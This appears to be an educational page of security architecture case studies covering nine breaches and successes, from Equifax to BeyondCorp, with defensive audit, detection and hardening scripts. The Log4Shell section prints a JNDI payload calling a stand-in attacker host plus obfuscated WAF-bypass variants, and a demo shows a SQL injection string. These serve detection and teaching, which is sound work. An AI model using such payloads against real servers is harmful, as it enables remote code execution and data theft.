Real-World Case Studies
Every architecture failure tells a story about controls that were missing, misconfigured, or ignored. These 9 case studies — 7 breaches and 2 success stories — span supply chain attacks, cloud misconfigurations, zero-days, and identity compromise, representing over $5 billion in damages.
Why Study Breaches as an Architect?
Attack Vector Landscape — 9 Case Studies by Category
Case Study 1: The Equifax Breach (2017)
What Happened
147 million records exposed due to an unpatched Apache Struts vulnerability (CVE-2017-5638). Attackers had access for 76 days before detection.
MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1505.003 (Web Shell), T1078 (Valid Accounts)
Equifax Attack Chain
Architecture Failures
- • Unpatched internet-facing server
- • Expired SSL certificate on monitoring tool
- • Flat network allowed lateral movement
- • Sensitive data not encrypted at rest
- • Poor network segmentation
Lessons Learned
- • Automated patch management is critical
- • Network segmentation limits blast radius
- • Encrypt sensitive data at rest
- • Monitor SSL certificate expiration
- • Defense in depth matters
What Would Have Prevented This
Case Study 2: Capital One Breach (2019)
What Happened
106 million records exposed via an SSRF attack against a misconfigured web application firewall (WAF) running in Capital One's AWS environment. The attacker used the WAF's overly permissive IAM role to access S3 buckets.
MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1552.005 (Cloud Instance Metadata), T1078 (Valid Accounts), T1530 (Data from Cloud Storage)
Capital One SSRF Attack Chain
Architecture Failures
- • WAF role had excessive S3 permissions
- • SSRF not blocked by WAF
- • IMDSv1 allowed credential theft
- • No detection of unusual API calls
- • Sensitive data in S3 not adequately protected
Lessons Learned
- • Apply least privilege to all IAM roles
- • Enforce IMDSv2 on AWS so SSRF cannot harvest instance credentials (on Azure, use managed identities instead of stored credentials)
- • Monitor CloudTrail (Activity Log on Azure) for anomalous API activity
- • Regular IAM permission audits
- • Cloud-native security tools matter
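The least-privilege and permission-audit lessons above can be partly automated. The sketch below flags `Allow` statements in an AWS-style IAM policy document that grant wildcard actions or apply to every resource. The policy shown is an invented example, not the role involved in the breach, and a real audit would also need to consider conditions, `NotAction`, and resource-based policies.

```python
import json

def wildcard_findings(policy):
    """Yield (sid, reason) for Allow statements with wildcard actions or resources."""
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):          # a single statement may be a bare object
        statements = [statements]
    for i, stmt in enumerate(statements):
        if stmt.get("Effect") != "Allow":
            continue
        sid = stmt.get("Sid", f"statement-{i}")
        actions = stmt.get("Action", [])
        resources = stmt.get("Resource", [])
        actions = [actions] if isinstance(actions, str) else actions
        resources = [resources] if isinstance(resources, str) else resources
        for action in actions:
            if action == "*" or action.endswith(":*"):
                yield sid, f"wildcard action {action}"
        for resource in resources:
            if resource == "*":
                yield sid, "applies to every resource"

# Hypothetical policy attached to a WAF instance role.
policy = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "WafLogs", "Effect": "Allow",
     "Action": ["s3:PutObject"],
     "Resource": "arn:aws:s3:::example-waf-logs/*"},
    {"Sid": "TooBroad", "Effect": "Allow",
     "Action": "s3:*", "Resource": "*"}
  ]
}
""")
findings = list(wildcard_findings(policy))
for sid, reason in findings:
    print(sid, "->", reason)
```

Only the `TooBroad` statement is reported. The `WafLogs` statement is scoped to one action on one bucket, which is closer to what a WAF role actually needs.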
Prevention: Enforce IMDSv2 & Least Privilege
# Reduce SSRF-based credential theft (the Capital One vector)
# AWS: require IMDSv2 session tokens (the instance ID is a placeholder)
aws ec2 modify-instance-metadata-options \
  --instance-id i-0123456789abcdef0 \
  --http-tokens required \
  --http-endpoint enabled
# Azure: use a system-assigned managed identity instead of stored credentials
az vm identity assign \
  --resource-group prod-rg \
  --name app-vm-01
# Audit ALL VMs for public IP exposure (review NSG rules separately)
az vm list -d --query '[].{Name:name, PublicIP:publicIps, RG:resourceGroup}' -o table
# Terraform: enforce managed identity (required arguments omitted for brevity)
resource "azurerm_linux_virtual_machine" "secure" {
  identity {
    type = "SystemAssigned" # Use managed identity, not stored credentials
  }
  # No public IP: public IPs are attached on the network interface's
  # ip_configuration, so reference only NICs that omit public_ip_address_id
  # and route inbound traffic through Application Gateway
}
What Would Have Prevented This
Case Study 3: SolarWinds Supply Chain Attack (2020)
What Happened
Nation-state attackers compromised SolarWinds' build system, injecting malware into Orion software updates. 18,000+ organizations installed the backdoor.
Architecture Failures
- • Build server compromise went undetected
- • Code signing didn't prevent injection
- • Trusted software had excessive network access
- • Minimal monitoring of outbound traffic
- • Domain fronting evaded detection
Lessons Learned
- • Secure the software supply chain
- • Reproducible builds for verification
- • Monitor build system integrity
- • Zero Trust for internal software too
- • Limit network access of monitoring tools
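The reproducible-builds lesson above comes down to a simple comparison: build the same source on two independent systems and check that the outputs are byte-identical. The sketch below shows that comparison in Python. The file names and contents are stand-ins, and a real pipeline would first need a deterministic build (fixed timestamps, pinned dependencies) for the hashes to match.

```python
import hashlib
import tempfile
from pathlib import Path

def sha256_file(path):
    """Stream a file through SHA-256 so large artifacts are not loaded into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def builds_match(artifact_a, artifact_b):
    """True when two independently built artifacts are byte-identical."""
    return sha256_file(artifact_a) == sha256_file(artifact_b)

# Throwaway files standing in for the outputs of separate build systems.
with tempfile.TemporaryDirectory() as tmp:
    ci_build = Path(tmp, "ci.bin")
    rebuild = Path(tmp, "rebuild.bin")
    tampered = Path(tmp, "tampered.bin")
    ci_build.write_bytes(b"release-1.0 payload")
    rebuild.write_bytes(b"release-1.0 payload")
    tampered.write_bytes(b"release-1.0 payload + implant")
    clean_ok = builds_match(ci_build, rebuild)
    tamper_ok = builds_match(ci_build, tampered)

print("independent rebuild matches:", clean_ok)
print("tampered build matches:", tamper_ok)
```

A mismatch does not prove compromise, but it is a signal that a signed artifact alone cannot give, because code signing only attests to who produced the binary, not to what went into it.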
SolarWinds Supply Chain Attack Flow
Prevention: Supply Chain Integrity Verification
# === Supply Chain Integrity (lessons from SolarWinds) ===
# 1. Verify SLSA build provenance (keyless verification also needs the signer
#    identity; the repository pattern below is a placeholder)
cosign verify-attestation \
  --type slsaprovenance \
  --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
  --certificate-identity-regexp "^https://github.com/org/app/" \
  ghcr.io/org/app:latest
# 2. Generate and scan SBOM for vulnerabilities
syft ghcr.io/org/app:latest -o spdx-json > sbom.json
grype sbom:sbom.json --fail-on critical
# 3. Verify artifact signatures before deployment
cosign verify --key cosign.pub ghcr.io/org/app:latest
# 4. Monitor build system integrity (cron job)
sha256sum /usr/local/bin/build-agent > /etc/integrity/build-agent.sha256
# */5 * * * * sha256sum -c /etc/integrity/build-agent.sha256 || alert
Case Study 4: Log4Shell (2021)
What Happened
CVE-2021-44228: a critical RCE in Apache Log4j 2 (CVSS 10.0). JNDI lookups embedded in logged strings allowed remote code execution. Because Log4j is bundled into so many Java applications and products, exposure was extremely broad.
MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1059.004 (Unix Shell), T1105 (Ingress Tool Transfer)
Log4Shell Attack Flow
Architecture Failures
- • Logging library had network call capability (violates economy of mechanism)
- • No SBOM — orgs didn't know where Log4j was deployed
- • Egress filtering not enforced (allowed LDAP/RMI outbound)
- • WAFs bypassed with obfuscation (${lower:j}ndi)
Lessons Learned
- • Maintain SBOMs for all applications
- • Restrict egress traffic by default
- • Libraries should follow least privilege
- • Defense in depth — patching alone isn't enough
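"Restrict egress traffic by default" means that an outbound connection is dropped unless a rule explicitly permits it. The sketch below models that decision in Python. The allowlist entries and addresses are hypothetical, and in practice the rule would be enforced by a firewall or security group rather than by application code.

```python
import ipaddress

# Hypothetical allowlist of (destination network, destination port) pairs.
EGRESS_ALLOW = [
    (ipaddress.ip_network("10.20.0.0/16"), 5432),   # internal database tier
    (ipaddress.ip_network("10.30.5.10/32"), 443),   # internal package mirror
]

def egress_allowed(dest_ip, dest_port):
    """Default deny: permit only destinations that match an allowlist entry."""
    addr = ipaddress.ip_address(dest_ip)
    return any(addr in net and dest_port == port for net, port in EGRESS_ALLOW)

db_call = egress_allowed("10.20.4.7", 5432)          # legitimate database traffic
ldap_callback = egress_allowed("203.0.113.50", 389)  # JNDI/LDAP callback attempt
odd_port = egress_allowed("203.0.113.50", 8443)      # attacker using another port

print(db_call, ldap_callback, odd_port)
```

The third check is the point of the design: a default-deny rule also stops callbacks on ports that a blocklist of LDAP and RMI ports would miss.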
Payload Anatomy — Why WAFs Weren't Enough
Basic payload: ${jndi:ldap://attacker.com/a}
Attackers rapidly developed obfuscated variants to bypass WAF rules:
- • ${${lower:j}ndi:ldap://...} (case manipulation)
- • ${${::-j}${::-n}${::-d}${::-i}:ldap://...} (string slicing)
- • ${${env:NaN:-j}ndi:ldap://...} (env variable defaults)
These bypassed simple WAF rules matching exact "jndi:" strings — demonstrating why egress filtering (blocking outbound LDAP/RMI) was the critical control, not just input filtering.
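To see why exact-string matching fails, it helps to collapse the nested lookups before searching for "jndi:". The Python sketch below handles only the three obfuscation styles listed above and assumes that any `${key:-default}` lookup resolves to its default. It is a detection heuristic under those assumptions, not a reimplementation of Log4j's lookup resolution, and the host name is a placeholder.

```python
import re

# Innermost ${...} expressions: no nested "$", "{" or "}" inside the braces.
INNER = re.compile(r"\$\{([^${}]*)\}")

def _resolve(match):
    body = match.group(1)
    lowered = body.lower()
    if lowered.startswith("jndi:"):
        return match.group(0)              # keep the pattern we are hunting for
    if lowered.startswith("lower:"):
        return body[6:].lower()
    if lowered.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                       # ${key:-default}: assume the key is unset
        return body.partition(":-")[2]
    return match.group(0)                  # unknown lookup: leave untouched

def normalize(text):
    """Repeatedly collapse simple lookups until the text stops changing."""
    while True:
        collapsed = INNER.sub(_resolve, text)
        if collapsed == text:
            return text
        text = collapsed

def looks_like_jndi(text):
    return "${jndi:" in normalize(text).lower()

samples = [
    "${jndi:ldap://attacker.example/a}",
    "${${lower:j}ndi:ldap://attacker.example/a}",
    "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}",
    "${${env:NaN:-j}ndi:ldap://attacker.example/a}",
    "user=alice action=login",
]
results = [looks_like_jndi(s) for s in samples]
for sample, hit in zip(samples, results):
    print(hit, sample)
```

Each new obfuscation style needs another branch in `_resolve`, which illustrates why input filtering alone loses the race and why the egress control matters.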
Detection & Response Playbook
# === Log4Shell (CVE-2021-44228) Detection & Response ===
# 1. Find Log4j JARs and report their versions (misses JARs nested inside fat JARs)
find / -name "log4j-core-*.jar" 2>/dev/null | while IFS= read -r jar; do
  version=$(unzip -p "$jar" META-INF/MANIFEST.MF 2>/dev/null | \
    grep Implementation-Version | cut -d' ' -f2 | tr -d '\r')
  echo "$jar -> v$version"
done
# 2. Scan logs for exploitation attempts (plain matches only; obfuscated payloads need broader patterns)
grep -rni 'jndi:' /var/log/ 2>/dev/null
# 3. Block outbound JNDI protocols (egress containment; exempt legitimate directory
#    servers first, and prefer default-deny egress because attackers can use other ports)
iptables -A OUTPUT -p tcp --dport 389 -j DROP # LDAP
iptables -A OUTPUT -p tcp --dport 636 -j DROP # LDAPS
iptables -A OUTPUT -p tcp --dport 1099 -j DROP # RMI
# 4. Emergency mitigation: remove JndiLookup class
zip -q -d log4j-core-*.jar \
  org/apache/logging/log4j/core/lookup/JndiLookup.class
# 5. Permanent fix: upgrade to Log4j >= 2.17.1
Case Study 5: Okta / Lapsus$ (2022)
What Happened
Lapsus$ compromised a third-party support contractor's laptop, gaining access to Okta's internal admin tools. Up to 366 Okta customers' tenants were potentially affected.
MITRE ATT&CK: T1199 (Trusted Relationship), T1078 (Valid Accounts), T1552 (Unsecured Credentials)
Architecture Failures
- • Third-party contractor had admin-level access
- • No separation of privilege for support tools
- • Delayed incident disclosure (2 months)
- • Insufficient access logging on contractor sessions
Lessons Learned
- • Apply Zero Trust to third-party access
- • Time-boxed, audited contractor sessions
- • Separation of duties for admin tools
- • Rapid incident communication to customers
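"Time-boxed, audited contractor sessions" can be expressed as a small authorization rule: a grant is valid for one tool, for a bounded window, and every decision is logged. The sketch below is a Python illustration under assumed names. The four-hour ceiling, the tool names, and the ticket format are hypothetical and do not describe Okta's systems.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

MAX_SESSION = timedelta(hours=4)   # hypothetical ceiling for any contractor grant

@dataclass(frozen=True)
class Grant:
    contractor: str
    tool: str
    ticket: str            # each grant is tied to a support ticket for audit
    issued_at: datetime
    duration: timedelta

def is_active(grant, now):
    """A grant is valid only inside its own window and under the global ceiling."""
    if grant.duration > MAX_SESSION:
        return False
    return grant.issued_at <= now < grant.issued_at + grant.duration

def authorize(grant, tool, now, audit_log):
    """Allow access to one tool during the grant window; log every decision."""
    allowed = grant.tool == tool and is_active(grant, now)
    audit_log.append((now.isoformat(), grant.contractor, tool, grant.ticket, allowed))
    return allowed

start = datetime(2022, 1, 20, 9, 0, tzinfo=timezone.utc)
grant = Grant("support-eng-17", "tenant-lookup", "TICKET-1234", start, timedelta(hours=1))
log = []
in_window = authorize(grant, "tenant-lookup", start + timedelta(minutes=30), log)
expired = authorize(grant, "tenant-lookup", start + timedelta(hours=2), log)
wrong_tool = authorize(grant, "password-reset", start + timedelta(minutes=30), log)

print(in_window, expired, wrong_tool, len(log))
```

Denied attempts are logged alongside allowed ones, since a contractor account probing tools outside its grant is exactly the signal that was missing.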
Case Study 6: MOVEit Transfer (2023)
What Happened
CVE-2023-34362 — SQL injection zero-day in Progress MOVEit Transfer exploited by Cl0p ransomware gang. 2,500+ organizations affected, 60M+ individuals' data stolen.
MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1505.003 (Web Shell), T1567 (Exfiltration Over Web Service)
Architecture Failures
- • SQL injection in 2023 — basic input validation missing
- • Web shell deployment not detected
- • File transfer app directly on internet without WAF
- • Mass data exfiltration went unnoticed
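The first failure above, SQL injection, comes from building SQL text out of user input. The generic Python sketch below contrasts string splicing with parameter binding, using an in-memory SQLite database. The table and data are invented for illustration, and this is not the vulnerable MOVEit code.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE files (owner TEXT, name TEXT)")
conn.executemany(
    "INSERT INTO files VALUES (?, ?)",
    [("alice", "payroll.csv"), ("bob", "contracts.pdf")],
)

def files_unsafe(owner):
    # Vulnerable: user input is spliced into the SQL text and parsed as SQL.
    query = f"SELECT name FROM files WHERE owner = '{owner}'"
    return [row[0] for row in conn.execute(query)]

def files_safe(owner):
    # Parameter binding: input is passed as data and never parsed as SQL.
    rows = conn.execute("SELECT name FROM files WHERE owner = ?", (owner,))
    return [row[0] for row in rows]

payload = "nobody' OR '1'='1"
leaked = files_unsafe(payload)   # the OR clause matches every row
safe = files_safe(payload)       # no owner has this literal name

print("unsafe query returned:", sorted(leaked))
print("safe query returned:", safe)
```

With binding, the payload is treated as an odd-looking owner name and matches nothing, while legitimate lookups such as `files_safe("alice")` behave as before.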
Lessons Learned
- • Never expose file transfer tools directly to internet
- • WAF + IDS in front of all public-facing apps
- • Monitor for web shell indicators
- • DLP to detect bulk data exfiltration
Detection: Web Shell Hunting & File Integrity
# === File Transfer Server Hardening (lessons from MOVEit) ===
# 1. Detect unauthorized web shells in MOVEit directories
Get-ChildItem -Path "C:\MOVEitTransfer\wwwroot" -Filter "*.aspx" -Recurse |
Where-Object { $_.Name -notin @("default.aspx","login.aspx","human.aspx") } |
Select-Object FullName, LastWriteTime, Length
# 2. File integrity monitoring vs. known-good baseline (CSV columns: Path, Hash)
$baseline = Import-Csv "C:\Security\moveit-baseline.csv"
Get-ChildItem -Path "C:\MOVEitTransfer\wwwroot" -Recurse -File |
ForEach-Object {
  $file = $_   # capture the file: inside Where-Object, $_ refers to the baseline row
  $hash = (Get-FileHash $file.FullName -Algorithm SHA256).Hash
  $known = $baseline | Where-Object { $_.Path -eq $file.FullName }
  if (-not $known -or $known.Hash -ne $hash) {
    Write-Warning "ALERT: $($file.FullName) status=$(if($known){'MODIFIED'}else{'NEW'})"
  }
}
# 3. Network architecture: NEVER expose file transfer directly
# Place behind reverse proxy + WAF, restrict source IPs, enable DLP
Case Study 7: Microsoft Storm-0558 (2023)
What Happened
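A China-based threat actor obtained a Microsoft account (MSA) consumer signing key. Microsoft's initial investigation pointed to a crash dump as the likely source, though this was not conclusively confirmed. The actor used the key to forge Azure AD tokens and access government email accounts.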
MITRE ATT&CK: T1552.004 (Private Keys), T1606.002 (SAML Tokens), T1114.002 (Email Collection)
Architecture Failures
- • Signing key in crash dump (dev environment leak)
- • Consumer key accepted by enterprise service (validation gap)
- • No key rotation forced after potential exposure
- • Cloud audit logs not available to affected tenants
Lessons Learned
- • Strict key isolation between consumer/enterprise
- • Sanitize crash dumps for sensitive material
- • Token validation must check issuer scope
- • Log access must be available to all customers
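The "token validation must check issuer scope" lesson means that a valid signature is not enough: the key that signed a token must also be authorized for the issuer the token claims. The Python sketch below shows only that scope check. The key IDs, issuer URLs, and registry structure are hypothetical, and cryptographic signature verification, which must happen first in a real validator, is deliberately left out.

```python
# Hypothetical key registry: key ID -> the issuer family the key may sign for.
KEY_SCOPES = {
    "consumer-key-1": "consumer",
    "enterprise-key-1": "enterprise",
}

# Hypothetical mapping from issuer URL to issuer family.
ISSUER_FAMILY = {
    "https://login.example/consumers": "consumer",
    "https://login.example/tenants/example-tenant": "enterprise",
}

class TokenRejected(Exception):
    pass

def check_key_scope(header, claims, expected_family):
    """Reject tokens whose signing key is not scoped to the issuer they claim."""
    key_scope = KEY_SCOPES.get(header.get("kid"))
    if key_scope is None:
        raise TokenRejected("unknown signing key")
    issuer_family = ISSUER_FAMILY.get(claims.get("iss"))
    if issuer_family is None:
        raise TokenRejected("unknown issuer")
    if key_scope != issuer_family:
        raise TokenRejected("key is not authorized for this issuer")
    if issuer_family != expected_family:
        raise TokenRejected("issuer not accepted by this service")
    return True

def accepts(header, claims, expected_family="enterprise"):
    try:
        return check_key_scope(header, claims, expected_family)
    except TokenRejected as exc:
        print("rejected:", exc)
        return False

enterprise_iss = {"iss": "https://login.example/tenants/example-tenant"}
legit = accepts({"kid": "enterprise-key-1"}, enterprise_iss)
forged = accepts({"kid": "consumer-key-1"}, enterprise_iss)   # consumer key, enterprise claim

print(legit, forged)
```

The forged case mirrors the validation gap listed above: the token names an enterprise issuer but was signed with a consumer key, so the scope check rejects it even if the signature itself is mathematically valid.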
Case Study 8: Cloudflare Thanksgiving 2023 (Positive)
What They Did Right
A suspected nation-state attacker used an access token and service account credentials stolen in the October 2023 Okta breach to access Cloudflare's self-hosted Atlassian server. Because of Cloudflare's Zero Trust architecture, the blast radius stayed minimal despite the initial access.
Why the Damage Was Limited
- • Zero Trust segmentation — Atlassian couldn't reach production
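- • Rotated more than 5,000 production credentials once the intrusion was found (the credentials stolen in the Okta breach had not been rotated beforehand, which enabled the initial access)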
- • Detection within hours via anomalous access patterns
- • Transparent public disclosure with full timeline
- • "Code Red" remediation — rotated every credential, even those not known compromised
Key Architecture Decisions
- • Assume breach mentality operationalized
- • Network segmentation prevented lateral movement to production
- • Comprehensive logging enabled rapid forensics
- • Incident response plan executed within minutes
Case Study 9: Secure Architecture Success - Google BeyondCorp
What They Did Right
After the Aurora attacks, Google rebuilt their security model. BeyondCorp eliminated the corporate network perimeter, implementing Zero Trust before it had a name.
Architecture Decisions
- • No trusted network—all access is identity-based
- • Device trust established through inventory and health
- • Access Proxy mediates all application access
- • Context-aware access policies
- • Works the same from office, home, or coffee shop
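The decisions above can be read as a single policy function: access depends on who the user is, the state of the device, and the application's requirements, and never on the network the request came from. The Python sketch below illustrates that idea. The policy table, group names, and field names are hypothetical and are not Google's implementation.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Request:
    user_groups: frozenset
    device_managed: bool      # device appears in the corporate inventory
    device_patched: bool      # device meets the current health baseline
    mfa_passed: bool
    source_network: str       # recorded for logging, never used to grant trust

# Hypothetical per-application policy.
POLICIES = {
    "source-code": {"groups": {"engineering"}, "require_patched": True},
    "lunch-menu": {"groups": {"engineering", "sales"}, "require_patched": False},
}

def decide(app, req):
    """Return True only if identity, device state and app policy all agree."""
    policy = POLICIES.get(app)
    if policy is None:
        return False                              # default deny for unknown apps
    if not (req.device_managed and req.mfa_passed):
        return False
    if policy["require_patched"] and not req.device_patched:
        return False
    return bool(policy["groups"] & req.user_groups)

office = Request(frozenset({"engineering"}), True, True, True, "office")
cafe = Request(frozenset({"engineering"}), True, True, True, "coffee-shop")
stale = Request(frozenset({"engineering"}), True, False, True, "office")

same_everywhere = decide("source-code", office) == decide("source-code", cafe)
stale_blocked = not decide("source-code", stale)
stale_low_risk = decide("lunch-menu", stale)

print(same_everywhere, stale_blocked, stale_low_risk)
```

The office and coffee-shop requests get the same answer because `source_network` never enters the decision, while an unpatched device on the office network is still refused for the sensitive application.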
Results
- • Eliminated VPN for most use cases
- • Consistent security regardless of location
- • Reduced attack surface dramatically
- • Better user experience than VPN
- • Model widely adopted as Zero Trust
Architecture Review Template
Security Architecture Review Checklist
1. Data Security
- ☐ Data classification completed
- ☐ Encryption at rest for sensitive data (AES-256)
- ☐ TLS 1.2+ for all data in transit
- ☐ Key management strategy defined (KMS/HSM)
- ☐ Data retention and disposal policy
2. Identity & Access
- ☐ Authentication mechanism defined (OAuth 2.0/OIDC)
- ☐ MFA enforced for all human access
- ☐ Authorization model documented (RBAC/ABAC)
- ☐ Service-to-service auth specified (mTLS/JWT)
- ☐ Least privilege applied and verified
- ☐ Account lifecycle management (JIT, deprovisioning)
3. Network Security
- ☐ Trust boundaries identified and documented
- ☐ Network segmentation designed (VPC, subnets)
- ☐ Ingress/egress controls defined
- ☐ DDoS mitigation considered
- ☐ DNS security (DNSSEC, DoH/DoT)
4. Application Security
- ☐ Input validation at every trust boundary
- ☐ OWASP Top 10 / API Top 10 mitigations
- ☐ Secrets management (no hardcoded credentials)
- ☐ Security headers configured (CSP, HSTS, XFO)
- ☐ Dependency scanning in CI/CD pipeline
5. Operations & Resilience
- ☐ Logging and monitoring strategy (SIEM/XDR)
- ☐ Incident response plan documented and tested
- ☐ Backup and recovery tested (RTO/RPO defined)
- ☐ Patch management process with SLAs
- ☐ Supply chain security (SBOM, vendor review)
Document Your Decisions
Framework Alignment
NIST CSF 2.0: RS (Respond), RC (Recover) — lessons for incident response
ISO 27002:2022: 5.24 (Information security incident management planning and preparation), 5.25 (Assessment and decision on information security events)
Cross-Cutting Analysis: Patterns Across Breaches
Mapping architectural failures across all 7 breaches shows which controls deliver the most protection. The table below lists each failure and the number of breaches (out of 7) to which it contributed.
| Architecture Failure | Breaches affected (of 7) |
|---|---|
| Inadequate monitoring / logging | 6 |
| Excessive privileges / permissions | 4 |
| Supply chain / third-party trust | 3 |
| Missing / late patching | 3 |
| No egress filtering | 3 |
| Missing network segmentation | 2 |
| No SBOM / asset inventory | 1 |
| Data not encrypted at rest | 2 |
Key Takeaway: Prioritize Detection
Architecture Case Study Labs
Apply breach analysis techniques to real-world scenarios and strengthen your architecture review skills.